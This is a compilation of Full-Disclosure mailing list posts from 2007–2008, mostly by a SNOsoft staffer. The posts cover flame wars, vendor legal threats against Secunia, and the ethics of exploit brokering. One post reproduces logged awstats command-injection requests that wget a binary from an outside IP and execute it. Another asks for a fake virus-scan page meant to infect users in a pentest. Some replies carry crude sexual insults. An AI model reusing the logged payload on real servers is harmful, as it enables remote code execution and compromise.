Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- - simon -- -- Discount Self Storage - Click Now! http://tagline.hushmail.com/fc/Ioyw6h4eNgRxmknFOzeHpFU4h9Dhb94V7lzv5LwV4DJhgz9VmBgXsR/ http://www.snosoft.com -- - simon -- http://www.snosoft.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] ASUS Eee PC rooted out of the box
cause we love you reepex! reepex wrote: Why do I get such nonsense said about me because I point out that Eric Harrison is a script kiddie, Simon Smith is in need of a new security team, and throwing 5000 As into a buffer is not hacking :( On Feb 9, 2008 10:36 AM, SilentRunner [EMAIL PROTECTED] mailto:[EMAIL PROTECTED] wrote: Amusing isn't it that everytime someone tells reepex to shutup, he/she acts as if he/she has a personal or business relationship with them, and that somehow he/she is important to this person. What transparent bollocks. Are you referring to Simon Smith? I assume you are. It is just strange that he would tell me so many times in email how inadequate and useless his security team is and how he wanted me to work for them, only to then make fun of me. It seems his is jealous/angry at me for not going with his company. It's the exact tactic used on us when running into one's annoying hosebeast of an ex while out with the new missus, and she says but you told me last night you loved me, even tho you haven't seen the mad bitch for 2 years. reepex has done this at least 3 times in the last 3 months and it pretty neatly ages him/her to his/her late teens. After reading this I believe you are a classic E-Psychiatrist [1] reepex has not contributed one useful thing to full disclosure, so I'm more than happy to join with the increasing majority, who would like it if he/she STFU. Yes I have. Ask coderman about my amazing revelation of htaccess in the url last week, while everyone was talking about 'firefox vulnerabilities' The good news is that if reepex were older and still exhibiting the same psycho-ex-girlfriend behaviour, it is highly unlikely that no- one will want to breed with it, so at least the line will stop there. Please see [1]. [1] http://www.encyclopediadramatica.com/E-Psychiatrist ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- - simon -- http://www.snosoft.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] ASUS Eee PC rooted out of the box
You remind me of fortune. Say something else crafty? Please? :) reepex wrote: hey simon, Are you still looking to replace your security team because of their inadequacies? You seemed pretty desperate for skilled workers last time we talked. On Feb 8, 2008 3:28 PM, Simon Smith [EMAIL PROTECTED] mailto:[EMAIL PROTECTED] wrote: You would know. ;] reepex wrote: On Feb 8, 2008 3:15 PM, Erik Harrison [EMAIL PROTECTED] mailto:[EMAIL PROTECTED] mailto:[EMAIL PROTECTED] mailto:[EMAIL PROTECTED] wrote: I appreciate knowing that I can visit my friends homes and root their boxes while they order pizza wirelessly on their couch. So you can 'root' your friends with a public vulnerability and exploit you didn't write? Isn't this what most people would call a script kiddie ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- - simon -- http://www.snosoft.com -- - simon -- http://www.snosoft.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] ASUS Eee PC rooted out of the box
You would know. ;] reepex wrote: On Feb 8, 2008 3:15 PM, Erik Harrison [EMAIL PROTECTED] mailto:[EMAIL PROTECTED] wrote: I appreciate knowing that I can visit my friends homes and root their boxes while they order pizza wirelessly on their couch. So you can 'root' your friends with a public vulnerability and exploit you didn't write? Isn't this what most people would call a script kiddie ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- - simon -- http://www.snosoft.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] (no subject)
Awww, reepex feels bad because he got turned down... ;] reepex wrote: only simon from snosoft and people from netragard try to hire people from FD ;) apparently they are not too satisfied with their current employees' skills On Dec 9, 2007 12:04 AM, dripping [EMAIL PROTECTED] mailto:[EMAIL PROTECTED] wrote: And would you like to join my new CYBERSECURITY FIRM? We post to mailing lists and advertise like we're not actually advertising for ourselves. reepex wrote: I tried responding to your mail but it seems you did not get it so maybe you will on the list yes I would LOVE to your join your crew - could you please email me your silc server and bbs board details? On Dec 3, 2007 8:00 AM, Gobbles is back [EMAIL PROTECTED] mailto:[EMAIL PROTECTED] wrote: Would you wish to join our crew ? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- - simon -- http://www.snosoft.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] (no subject)
Your kewl dripping wrote: porn stars, people who love to drip semen all over women's faces, etc etc hopefully you catch my drip. LOL U C WUT I DID THAR???/// any new leet TRU64 EXPLOITS COMIN OUT? maybe you can actually get HP to like you this time Simon Smith wrote: lol, what kind of self respecting person uses the name dripping? ;] dripping wrote: What kind of self-respecting, ubar serious firm, group, or..well, anything, for that matter, uses blogspot.com for their utterly useless information. ty bai ;) Simon Smith wrote: Awww, reepex feels bad because he got turned down... ;] reepex wrote: only simon from snosoft and people from netragard try to hire people from FD ;) apparently they are not too satisfied with their current employees' skills On Dec 9, 2007 12:04 AM, dripping [EMAIL PROTECTED] mailto:[EMAIL PROTECTED] wrote: And would you like to join my new CYBERSECURITY FIRM? We post to mailing lists and advertise like we're not actually advertising for ourselves. reepex wrote: I tried responding to your mail but it seems you did not get it so maybe you will on the list yes I would LOVE to your join your crew - could you please email me your silc server and bbs board details? On Dec 3, 2007 8:00 AM, Gobbles is back [EMAIL PROTECTED] mailto:[EMAIL PROTECTED] wrote: Would you wish to join our crew ? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- - simon -- http://www.snosoft.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] (no subject)
Forward what ever you want, just make sure to edit it first so that you don't look like a liar ;) dripping wrote: I like how he still hasn't responded. reepex wrote: im going to wait for simon to respond ;P he is really good at making himself look like an idiot On Dec 9, 2007 1:39 PM, dripping [EMAIL PROTECTED] wrote: not that i care if this is on/off the list, do it * 9000. reepex wrote: turned down? should i forward the list the emails were you and that random from netragard were begging me to work for you? On Dec 9, 2007 12:17 PM, Simon Smith [EMAIL PROTECTED] wrote: Awww, reepex feels bad because he got turned down... ;] reepex wrote: only simon from snosoft and people from netragard try to hire people from FD ;) apparently they are not too satisfied with their current employees' skills On Dec 9, 2007 12:04 AM, dripping [EMAIL PROTECTED] mailto:[EMAIL PROTECTED] wrote: And would you like to join my new CYBERSECURITY FIRM? We post to mailing lists and advertise like we're not actually advertising for ourselves. reepex wrote: I tried responding to your mail but it seems you did not get it so maybe you will on the list yes I would LOVE to your join your crew - could you please email me your silc server and bbs board details? On Dec 3, 2007 8:00 AM, Gobbles is back [EMAIL PROTECTED] mailto:[EMAIL PROTECTED] wrote: Would you wish to join our crew ? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- - simon -- http://www.snosoft.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- - simon -- http://www.snosoft.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] (no subject)
and yes.. I'll stop playing with the children now. Simon Smith wrote: Forward what ever you want, just make sure to edit it first so that you don't look like a liar ;) dripping wrote: I like how he still hasn't responded. reepex wrote: im going to wait for simon to respond ;P he is really good at making himself look like an idiot On Dec 9, 2007 1:39 PM, dripping [EMAIL PROTECTED] wrote: not that i care if this is on/off the list, do it * 9000. reepex wrote: turned down? should i forward the list the emails were you and that random from netragard were begging me to work for you? On Dec 9, 2007 12:17 PM, Simon Smith [EMAIL PROTECTED] wrote: Awww, reepex feels bad because he got turned down... ;] reepex wrote: only simon from snosoft and people from netragard try to hire people from FD ;) apparently they are not too satisfied with their current employees' skills On Dec 9, 2007 12:04 AM, dripping [EMAIL PROTECTED] mailto:[EMAIL PROTECTED] wrote: And would you like to join my new CYBERSECURITY FIRM? We post to mailing lists and advertise like we're not actually advertising for ourselves. reepex wrote: I tried responding to your mail but it seems you did not get it so maybe you will on the list yes I would LOVE to your join your crew - could you please email me your silc server and bbs board details? On Dec 3, 2007 8:00 AM, Gobbles is back [EMAIL PROTECTED] mailto:[EMAIL PROTECTED] wrote: Would you wish to join our crew ? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- - simon -- http://www.snosoft.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- - simon -- http://www.snosoft.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] (no subject)
Hah, ok that was funny, but I'm really going to shut up now cause this thread is pointless. ;. ripping wrote: pedophilia is pretty serious. Simon Smith wrote: and yes.. I'll stop playing with the children now. Simon Smith wrote: Forward what ever you want, just make sure to edit it first so that you don't look like a liar ;) dripping wrote: I like how he still hasn't responded. reepex wrote: im going to wait for simon to respond ;P he is really good at making himself look like an idiot On Dec 9, 2007 1:39 PM, dripping [EMAIL PROTECTED] wrote: not that i care if this is on/off the list, do it * 9000. reepex wrote: turned down? should i forward the list the emails were you and that random from netragard were begging me to work for you? On Dec 9, 2007 12:17 PM, Simon Smith [EMAIL PROTECTED] wrote: Awww, reepex feels bad because he got turned down... ;] reepex wrote: only simon from snosoft and people from netragard try to hire people from FD ;) apparently they are not too satisfied with their current employees' skills On Dec 9, 2007 12:04 AM, dripping [EMAIL PROTECTED] mailto:[EMAIL PROTECTED] wrote: And would you like to join my new CYBERSECURITY FIRM? We post to mailing lists and advertise like we're not actually advertising for ourselves. reepex wrote: I tried responding to your mail but it seems you did not get it so maybe you will on the list yes I would LOVE to your join your crew - could you please email me your silc server and bbs board details? On Dec 3, 2007 8:00 AM, Gobbles is back [EMAIL PROTECTED] mailto:[EMAIL PROTECTED] wrote: Would you wish to join our crew ? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- - simon -- http://www.snosoft.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- - simon -- http://www.snosoft.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Flash that simulates virus scan
Indeed... I've certainly helped to make a fool of me. ;] Dude VanWinkle wrote: well, confusing reepex with an infosec worker is pretty bad, but we might let you off the hook this one time. Dont let it happen again :-) On Dec 9, 2007 3:23 PM, Simon Smith [EMAIL PROTECTED] wrote: looks like I responded to the wrong person... I'm a fool. reepex wrote: the first email from simon asking about where i work following a succesful troll of some random kiddie On Oct 31, 2007 4:37 PM, Simon Smith [EMAIL PROTECTED] mailto:[EMAIL PROTECTED] wrote: Reepex, What company are you with? I'm actually interested in finding infosec companies that perform real work as opposed to doing everything automated. Nice to hear that you're a real tester. With respect to your question, doesn't msf3 have some of that functionality already built into it? Have you already hit all their web-apps? reepex wrote: resulting to se in a pen test cuz you cant break any of the actual machines? lulz On 10/31/07, Joshua Tagnore [EMAIL PROTECTED] mailto:[EMAIL PROTECTED] wrote: List, Some time ago I remember that someone posted a PoC of a small site that had a really nice looking flash animation that performed a virus scan and after the virus scan was finished, the user was prompted for a Download virus fix? question. After that, of course, a file is sent to the user and he got infected with some malware. Right now I'm performing a penetration test, and I would like to target some of the users of the corporate LAN, so I think this approach is the best in order to penetrate to the LAN. I searched google but failed to find the URL, could someone send it to me ? Thanks! Cheers, -- Joshua Tagnore ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- - simon -- http://www.snosoft.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- - simon -- http://www.snosoft.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [SECUNIA] Vendors still use the legal weapon
I would have thought that by this time businesses would be more savvy to the entire vulnerability disclosure process. They don't seem to realize that in most cases its more damaging to try to quash research than it is to accept it with open arms. That is after all because quashing research is nearly synonymous with lying to customers. This reminds me of the HP v.s. SNOsoft fiasco back in 2001. Thomas Kristensen wrote: In these days, one would have believed that vendors have learned the lesson not to threaten with legal actions to withhold and suppress significant information about vulnerabilities in their products. Well, nonetheless, Secunia just received a sequel of letters from Autonomy, likely not known to many, but it is the software company that supplies the Swiss Army Knife in handling and opening documents in well known software like IBM Lotus Notes and Symantec Mail Security. *First a little background information* The communication between Autonomy and their OEM customers regarding which versions of their KeyView software that fix given vulnerabilities has failed again and again. This has been a mess to sort out and Secunia has had to spent hours verifying what e.g. was fixed by IBM and what was fixed by Symantec - because apparently the versioning of the KeyView software is different whether used by Symantec, IBM, or others. We've managed to figure this out and occasionally this has caused one of Autonomy's OEM customers to have unpatched publicly known vulnerabilities in their products. All thanks to Autonomy's apparent inability to co-ordinate the release of new vulnerability fixes with their customers. Now, Autonomy has become fed up with handling all these vulnerabilities and believe that it is time to control what Secunia writes about. Autonomy wants Secunia to withhold information about the fact that vulnerability SA27835 in Keyview Lotus 1-2-3 File Viewer, which has been fixed by IBM, obviously also affects Autonomy's own versions 9.2 and 10.3 of KeyView. According to Autonomy, publishing an advisory would be misleading and cause confusion because the issues already have been fixed; in fact, they believe that this would cause the public to believe that there are more issues in their product than is the case! Now that is an interesting logic. Sorry Autonomy, writing an advisory that states which vulnerabilities have been fixed and in which versions is in no way misleading or confusing - even for historical issues. What is really interesting here is the fact that the Vulnerability Database services offered by Autonomy's own customers IBM and Symantec (ISS X-Force and Securityfocus respectively) still (at the time of publishing) don't show information about the fact that patches are available for the Lotus 1-2-3 issue - while Secunia, who Autonomy accuses of publishing misleading information, correctly reflects the fact that Autonomy offers patches. However, this doesn't seem to be a concern for Autonomy or perhaps their legal department also treats their own customers in the same way as Secunia is treated? What is misleading and confusing in this whole case is the apparent lack of co-ordination between Autonomy and Autonomy's OEM customers, the lack of clear, precise public statements about vulnerabilities and security fixes. If Autonomy wants to avoid misleading and confusing communication, then Autonomy ought to start publishing bulletins such as those made by most other serious and established software vendors (e.g. Microsoft and their own customers IBM and Symantec) with clear information about the type of vulnerability, potential attack vectors, potential impacts, affected versions, and unaffected versions - it's really that simple. Naturally, Autonomy should also communicate to their own customers (IBM and Symantec) that patches addressing vulnerabilities are available so that both their products and their Vulnerability Database services are updated. *Our response to these claims and accusations* Despite Autonomy's unsubstantiated legal threats, Secunia will quite legally continue to do vulnerability research in Autonomy products and any other products of interest. Naturally, Secunia will also continue to publish research articles and advisories in an unbiased, balanced, accurate, and truthful manner as we serve one purpose only: To provide accurate and reliable Vulnerability Intelligence to our customers and the Internet in general. Secunia is in continuous, ongoing, and positive dialogues with most vendors including large professional organisations like Microsoft, IBM, Adobe, Symantec, Novell, Apple, and CA. All understand and respect the need for informing the public about vulnerabilities and prefer to co-ordinate and synchronise the publication with important Vulnerability Intelligence sources such as Secunia rather than battling to keep things secret. It is truly sad to
[Full-disclosure] Barbut
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Anyone else seen these really 3l337 attacks? From: 196.212.26.82 GET /stats/awstats.pl?configdir=|echo;cd%20/tmp;wget%2085.114.128.21/barbut;chmod%20755%20barbut;./barbut;echo| HTTP/1.0 Host: [removed] User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)Connection: close Cache-Control: max-age=259200 Connection: keep-alive From: 196.35.158.181 GET /awstats.pl?configdir=|echo;cd%20/tmp;wget%2085.114.128.21/barbut;chmod%20755%20barbut;./barbut;echo| HTTP/1.1 Host: [ removed ] Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)Connection: close Cache-Control: max-age=259200 X-Forwarded-For: 196.212.26.82 Via: 1.0 nc5-rba (NetCache NetApp/5.5R6D17DEBUG1) gotta love script kids... - -- - - simon - -- http://www.snosoft.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.5 (Darwin) iD8DBQFHRITrf3Elv1PhzXgRAshmAKCZa1k508Xhb3y0tYmegm15T4hzVQCfYOY3 ++PvxKBY95glAocK8sX/03E= =bBXp -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Crafted SYN Packets...
Kelly, SYN packets and ports do not correlate. And yes, SYN is TCP. You should read up on TCP/IP etc so that you understand protocols before posting to mailing lists. Kelly Robinson wrote: Looking at some suspicious behaviour in our logs... If someone sends a packet with the SYN bit set to a host, typically what is the client's source port? Or is that crafted too? And additionally, when a client does sent a packet of this type, am I right in assuming its generally TCP only? Can you have a UDP SYN packet? I assume because its connectionless, no??? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- - simon -- http://www.snosoft.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Hushmail == Narqz
Ah well, if a friend did that to me... hrm... I'd probably tar and feather him near an open flame. ;] Byron Sonne wrote: Paul, This hardly means that the hushmail crew are narqz, it just means that they are cooperating with the law like any legitimate business would. No, it doesn't mean they're narqa, but it does mean they're spineless pussies that eagerly sell people out. If a friend did that to you, what would you think of them? Take 'em down. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- - simon -- http://www.snosoft.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Exploit Brokering
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [ This email is in response to all of the emails that I see with people trying to broker exploits by advertising them on full disclosure and other public mailing lists. ] SNOsoft has been legitimately and legally brokering exploits since early 2000, and we're still doing it very successfully. As a matter of policy we will not ever purchase items from careless developers, and will not sell to careless buyers or non US based buyers... With exploit brokering comes great responsibility and liability. People posting emails in public forums in an attempt to sell exploits is not only careless and irresponsible, but is also a testament to that persons immaturity and lack of experience. Do they ever stop to think about the potential liability? What happens if they sell to a hostile foreign party, what could happen to them, etc...? I think that there is a legitimate market for Exploit Brokering when it is done properly (ethically and legally). I think that in that market the developers should adhere to strict rules and not cross certain boundaries. I also think that the responsible and ethical developers should be paid fair value for their time, instead of a pathetic maximum of $5,000.00 for a high grade item. Think about it, the average QA Engineer makes more money per bug than the higher talent security researcher. There's something wrong with that. The solution to that problem is not to sell exploits to just anyone in a public forum. That introduces too much liability to the developer, especially if the buyer is illegitimate or hostile. The solution is to work with legitimate established businesses in a confidential and responsible manner. Unfortunately for those developers that are trying to sell exploits in public forum, their chances of working with legitimate businesses are gone. No way will any of the legitimate Exploit Brokers ever purchase an item from an irresponsible developer. Its just a matter of time till laws get passed and they end up getting thrown in jail for selling weaponized exploits to the wrong people. - -- - - simon - -- http://www.snosoft.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.5 (Darwin) iD8DBQFHNMFmf3Elv1PhzXgRAiVyAKCgKIhDLpqjkOK+Ndu+JHol2F7s1ACfbXFa 1Ju3+ZCeSWeDisUigMs1FY0= =uA7p -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Exploit Brokering
Please forgive me... should I beg for mercy? ;] Joey Mengele wrote: This is hardly on topic and you do not have any unique credentials to validate your claims. Please refrain from writing off topic and baseless editorials in the future or risk moderation. Thanks. J On Fri, 09 Nov 2007 15:22:01 -0500 Simon Smith [EMAIL PROTECTED] wrote: [ This email is in response to all of the emails that I see with people trying to broker exploits by advertising them on full disclosure and other public mailing lists. ] SNOsoft has been legitimately and legally brokering exploits since early 2000, and we're still doing it very successfully. As a matter of policy we will not ever purchase items from careless developers, and will not sell to careless buyers or non US based buyers... With exploit brokering comes great responsibility and liability. People posting emails in public forums in an attempt to sell exploits is not only careless and irresponsible, but is also a testament to that persons immaturity and lack of experience. Do they ever stop to think about the potential liability? What happens if they sell to a hostile foreign party, what could happen to them, etc...? I think that there is a legitimate market for Exploit Brokering when it is done properly (ethically and legally). I think that in that market the developers should adhere to strict rules and not cross certain boundaries. I also think that the responsible and ethical developers should be paid fair value for their time, instead of a pathetic maximum of $5,000.00 for a high grade item. Think about it, the average QA Engineer makes more money per bug than the higher talent security researcher. There's something wrong with that. The solution to that problem is not to sell exploits to just anyone in a public forum. That introduces too much liability to the developer, especially if the buyer is illegitimate or hostile. The solution is to work with legitimate established businesses in a confidential and responsible manner. Unfortunately for those developers that are trying to sell exploits in public forum, their chances of working with legitimate businesses are gone. No way will any of the legitimate Exploit Brokers ever purchase an item from an irresponsible developer. Its just a matter of time till laws get passed and they end up getting thrown in jail for selling weaponized exploits to the wrong people. -- - simon -- http://www.snosoft.com -- Click for free info on marketing degrees and make up to $150K/ year http://tagline.hushmail.com/fc/Ioyw6h4dDIrjbxctdTv0TSwcEUd8ohtJYd5yOv5FWQ7CcpXXXTOy6x/ -- - simon -- http://www.snosoft.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Exploit Brokering
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 First Answer: Only work with partners that are well established, incorporated, and have a legitimate use for the items that they want to purchase. Do not work with individual buyers/people, there's too much liability and no way to verify that they are actually US based. Make sure that every single transaction is done under tight legally binding contract. Perform background checks as necessary, etc. Second Answer: Same as the first one. Obviously this is just a light summary of the process that we follow, but it should give you an idea as to how we do business. security curmudgeon wrote: Hi Simon, : SNOsoft has been legitimately and legally brokering exploits since early : 2000, and we're still doing it very successfully. As a matter of policy : we will not ever purchase items from careless developers, and will not : sell to careless buyers or non US based buyers... With exploit brokering : comes great responsibility and liability. : : People posting emails in public forums in an attempt to sell exploits is : not only careless and irresponsible, but is also a testament to that : persons immaturity and lack of experience. Do they ever stop to think : about the potential liability? What happens if they sell to a hostile : foreign party, what could happen to them, etc...? Can you describe SNOsoft's process for validating buyers and assuring they are US based? Is there any process to ensure that even though they are US based they do not have any ill intention toward their country? Just because someone has a US ID doesn't mean they were born here or not working for a foreign party. jericho - -- - - simon - -- http://www.snosoft.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.5 (Darwin) iD8DBQFHNMdpf3Elv1PhzXgRAigLAJ9maYZlSEEBVjQ1cEZMrz0qpM3IOwCgplaF icYpd9+fSAcPr45wKnCgav0= =Qr8j -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Exploit Brokering
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Thierry, my comments are below. Thierry Zoller wrote: Dear Simon, Well if it wasn't obvious enough let me rephrase. SS What happens if they sell to a hostile SS foreign party, what could happen to them, etc...? Maybe they pereive your party as a hostile foreign party, this list is obviously not based in the US. SS What's your point? I think my point is very clear, those trying to find a buyer on this list (who you are directly speaking to in your post) are maybe not interested in selling to US based parties. You assume they are. Right, I did make that assumption and that was purely based on my perspective as a US based broker. There is no reason why the same kind of business can't be done in other countries. I was thinking strictly about my liabilities as a US based person and my restrictions only. The US is only one country out of many. To make this even clearer : SSDo they ever stop to think SS about the potential liability? What happens if they sell to a hostile SSforeign party, what, what could happen to them, etc...? Maybe the hostile foreign party for them is the USA. Quite possibly and I could think of many reasons why people would think so, especially with our current president in office. The solution is to work with legitimate established businesses in a confidential and responsible manner. If you are responsible you surely can disclose who you are selling them too ? SS That would be irresponsible. Why would disclosing who you are selling them to be irresponsible ? You argue that those seeking to sell over FD are carelss and irresponsible. Now why if they sell them to you makes them less careless and irresponsible since they still don't know with whom the information will end up with. Again from my perspective it would be irresponsible as we have confidentiality agreements in place with partners. It might not be irresponsible for others to disclose that information. Are you even disclosing this to the person that you bought them from ? When not does this make you any better than the others ? SS I have no idea what you are asking me here. Are you disclosing _to the person_ you bought the bugs from, to whom you are going to sell them ? If not I don't see the interest why they should choose you over others for ethical reasons. Same answer as above. I should apologize because the initial email sounded very arrogant. With that said, there is still responsible brokering and irresponsible brokering. Selling exploits to just anyone is irresponsible. - -- - - simon - -- http://www.snosoft.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.5 (Darwin) iD8DBQFHNNNaf3Elv1PhzXgRAsIRAKDHzj0Z6jMQk+A6Qkl1cWoQdzMApQCgjCI9 DD1lLw2QWmAVKC/7J/XmQTk= =enDt -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Exploit Brokering
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 No doubt... [EMAIL PROTECTED] wrote: On Fri, 09 Nov 2007 16:38:35 EST, Simon Smith said: Thierry Zoller wrote: Maybe the hostile foreign party for them is the USA. Quite possibly and I could think of many reasons why people would think so, especially with our current president in office. Note that given the recent approval polls for said president, you can probably strike foreign from Thierry's comment and it still be correct... - -- - - simon - -- http://www.snosoft.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.5 (Darwin) iD8DBQFHNNYpf3Elv1PhzXgRAnSOAJwNe3L78ON7kcQL3QjJefJPS+wwlwCeN+kC ydvhgAGKVrHedbSJUhzlmio= =0Hxy -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Exploit Brokering
